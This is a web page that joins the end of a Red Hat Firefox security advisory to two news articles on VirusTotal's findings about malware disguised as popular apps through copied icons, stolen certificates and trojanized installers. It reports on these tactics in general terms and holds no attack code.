firefox-debuginfo-91.12.0-2.el8_2.s390x.rpm  
firefox-debugsource-91.12.0-2.el8_2.s390x.rpm

x86_64:  
firefox-91.12.0-2.el8_2.x86_64.rpm  
firefox-debuginfo-91.12.0-2.el8_2.x86_64.rpm  
firefox-debugsource-91.12.0-2.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2505  
https://access.redhat.com/security/cve/CVE-2022-36318  
https://access.redhat.com/security/cve/CVE-2022-36319  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYuqtGtzjgjWX9erEAQjZrBAAiHKiZZS88J/8+Bhx9Mxy/+cP81vNJrpM  
0Baqazt9y7GY3R4E/+mukM+94ffKbrp8jY4r/65YUQWearmkCLNccMjnnvZDHOdk  
a0U1POusGiRZiYy0cBeW0c1i6D6wYkOrn9pHNLiJmR7h6UTizrFPWuED9FIGotL9  
97w5UaR5sd4g3B8M1ApZKwHU+fqVfSdUEaZruhVhEr9+TOAmm84nKs7s7hRZdsEz  
XQjqEjIvIsRY06tOtBH28uFUJFuPg0vTGHb/OnZk+kM3FLKFT9FYn4tWfs2/f3ll  
014a+aLnOJnAYauSngjNxC6pQevjbHERambdPflHeMkLp9eIXWSDgitSRbAEa3N6  
wqBeeqUPT+Li4yqRj/Um6dUNNDqDkg9dyU9qmkzwlVdj/oOV3JcQJXxscF+0tnNs  
TfuiFzE4izDWr32zDcpNVNLH09MBJrauxpQhlrq41cMqMtqghx7RMSd0GLcT4Qc4  
oEO6AVRDtlnv0CbwKzdX7LPL7+H8E9XtTn2+5AOYs+Jrm7lWYjSlH+/yyzFXEZpV  
6XYS2939cAe+HeKgSWcZ8e2szgEsHxBRU5Z6AqtMyiGadLynX+FD7dfve2+yx72Z  
Kt48NaAwgWtEysiTjVbQPTe91mIk/52iNhxbQSP+md/wXHRFcv6TEsP5H+ADwRBR  
tuDh9q6ZbXA=VaGw  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5765-01

By Deeba Ahmed
According to the latest research findings from VirusTotal, cybercriminals and threat actors are increasingly relying on mimicked versions…
This is a post from HackRead.com Read the original post: VirusTotal Reveals Apps Most Exploited by Hackers to Spread Malware

According to the latest research findings from **VirusTotal**, cybercriminals and threat actors are increasingly relying on mimicked versions of genuine, common-use apps such as Adobe Reader, Skype, and VLC Player to successfully conduct social engineering attacks.

**Findings Details**

In their study of malware, researchers at Google’s VirusTotal revealed that cybercriminals deploy numerous approaches to abuse the trust users have in many reputable apps.

The most widespread tactic is **mimicking legit apps to deliver malware**. In this technique, the app’s icon is replicated to gain the victim’s trust and convince them to use the mimicked app. The purpose behind this malicious new strategy is to bypass security solutions such as IP or domain-based firewalls on devices and spread malware via trusted domains.

Another commonly used attack tactic is stealing authentic signing certificates from legit software vendors and using them for signing the malware. Reportedly, since 2021, over one million signed samples had been declared suspicious.

Around thirteen percent of the samples checked by Google’s team didn’t have a valid signature when uploaded on VirusTotal for the first time, and over ninety-nine percent of them were DLL or Windows Portable Executable files.

This happens because the process of examining the validity of a signed file can be abused by malware stated VirusTotal security engineer Vicente Diaz. This becomes concerning when attackers start stealing legit certificates and creating an **ideal supply chain attack scenario**.

The third technique is incorporating legit installers as a portable executable resource into malicious samples to execute the installer when malware is run.

1.  **Microsoft Office Most Exploited Software in Malware Attacks**
2.  **US and China Exposed Most Databases Among 380k Found in 2021**
3.  **Fake reviews & third-party apps cause 50% of threats against Android**
4.  **134 million downloads in 85 countries: A look at VPN usage in H1 2020**
5.  **Google, Microsoft and Oracle generated the most vulnerabilities in 2021**
6.  **Google Drive accounted for 50% of malicious Office document downloads**

**Over 2 Million Suspicious Files Downloaded from Top Domains**

According to VirusTotal’s **blog post**, ten percent of the **top 1,000 Alexa domains** had distributed suspicious samples, including the domains commonly used for distributing files, and over 2 million shady files were downloaded from these domains.

Despite the technique’s simplicity, Diaz explains, it can effectively avoid raising red flags for the victim. That’s why many channels are becoming popular as potent malware distribution vectors. This includes the distribution of **cracked software**.

**Most Abused Websites and Apps**

The top three mimicked apps include the following:

*   Adobe Acrobat
*   VLC media player
*   Skype VoIP platform

When they researchers examined the URLs using web icon similarity, WhatsApp, Instagram, Facebook, and iCloud were the four most abused sites.

> “Adobe Acrobat, Skype, and 7zip are very popular and have the highest infection ratio, which probably makes them the top three applications and icons to be aware of from a social engineering perspective.”
> 
> VirusTotal

Furthermore, VirusTotal discovered 1,816 samples since January 2020 masquerading legit software by hiding the malware in installers for popular software like Zoom, Google Chrome, Proton VPN, Brave, and Mozilla Firefox.

Other impersonated apps by icon were TeamViewer, 7-Zip, CCleaner, Steam, Microsoft Edge, Zoom, and WhatsApp. The abused domains included are discordappcom, squarespacecom, amazonawscom, mediafirecom, and qqcom. 

The reason why attackers are using these software and apps is unknown as yet but one reason could be their popularity, Diaz stated.

**More Malware News**

1.  **Malware families using Pay-Per-Install service to expand targets**
2.  **This malware hides behind free VPN, pirated security software keys**
3.  **Fake KPSPico Windows activator tool KPSPico steals crypto wallet data**
4.  **Malware droppers for hire targeting users on fake pirated software sites**
5.  **Researchers Warn of New Variants of ChromeLoader Browser in the Wild**

VirusTotal Reveals Apps Most Exploited by Hackers to Spread Malware

Threat actors are increasingly mimicking legitimate applications like Skype, Adobe Reader, and VLC Player as a means to abuse trust relationships and increase the likelihood of a successful social engineering attack.
Other most impersonated legitimate apps by icon include 7-Zip, TeamViewer, CCleaner, Microsoft Edge, Steam, Zoom, and WhatsApp, an analysis from VirusTotal has revealed.
"One of the

Threat actors are increasingly mimicking legitimate applications like Skype, Adobe Reader, and VLC Player as a means to abuse trust relationships and increase the likelihood of a successful social engineering attack.

Other most impersonated legitimate apps by icon include 7-Zip, TeamViewer, CCleaner, Microsoft Edge, Steam, Zoom, and WhatsApp, an analysis from VirusTotal has revealed.

"One of the simplest social engineering tricks we've seen involves making a malware sample seem a legitimate program," VirusTotal said in a Tuesday report. "The icon of these programs is a critical feature used to convince victims that these programs are legitimate."

It's no surprise that threat actors resort to a variety of approaches to compromise endpoints by tricking unwitting users into downloading and running seemingly innocuous executables.

This, in turn, is primarily achieved by taking advantage of genuine domains in a bid to get around IP-based firewall defenses. Some of the top abused domains are discordapp\[.\]com, squarespace\[.\]com, amazonaws\[.\]com, mediafire\[.\]com, and qq\[.\]com.

In total, no fewer than 2.5 million suspicious files downloaded from 101 domains belonging to Alexa's top 1,000 websites have been detected.

The misuse of Discord has been well-documented, what with the platform's content delivery network (CDN) becoming a fertile ground for hosting malware alongside Telegram, while also offering a "perfect communications hub for attackers."

Another oft-used technique is the practice of signing malware with valid certificates stolen from other software makers. The malware scanning service said it found more than one million malicious samples since January 2021, out of which 87% had a legitimate signature when they were first uploaded to its database.

VirusTotal said it also uncovered 1,816 samples since January 2020 that masqueraded as legitimate software by packaging the malware in installers for other popular software such as Google Chrome, Malwarebytes, Zoom, Brave, Mozilla Firefox, and Proton VPN.

Such a distribution method can also result in a supply chain when attackers manage to break into a legitimate software's update server or gain unauthorized access to the source code, making it possible to sneak the malware in the form of trojanized binaries.

Alternatively, legitimate installers are being packed in compressed files along with malware-laced files, in one case including the legitimate Proton VPN installer and malware that installs the Jigsaw ransomware.

That's not all. A third method, albeit more sophisticated, entails incorporating the legitimate installer as a portable executable resource into the malicious sample so that the installer is also executed when the malware is run so as to give an illusion that the software is working as intended.

"When thinking about these techniques as a whole, one could conclude that there are both opportunistic factors for the attackers to abuse (like stolen certificates) in the short and mid term, and routinely (most likely) automated procedures where attackers aim to visually replicate applications in different ways," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#firefox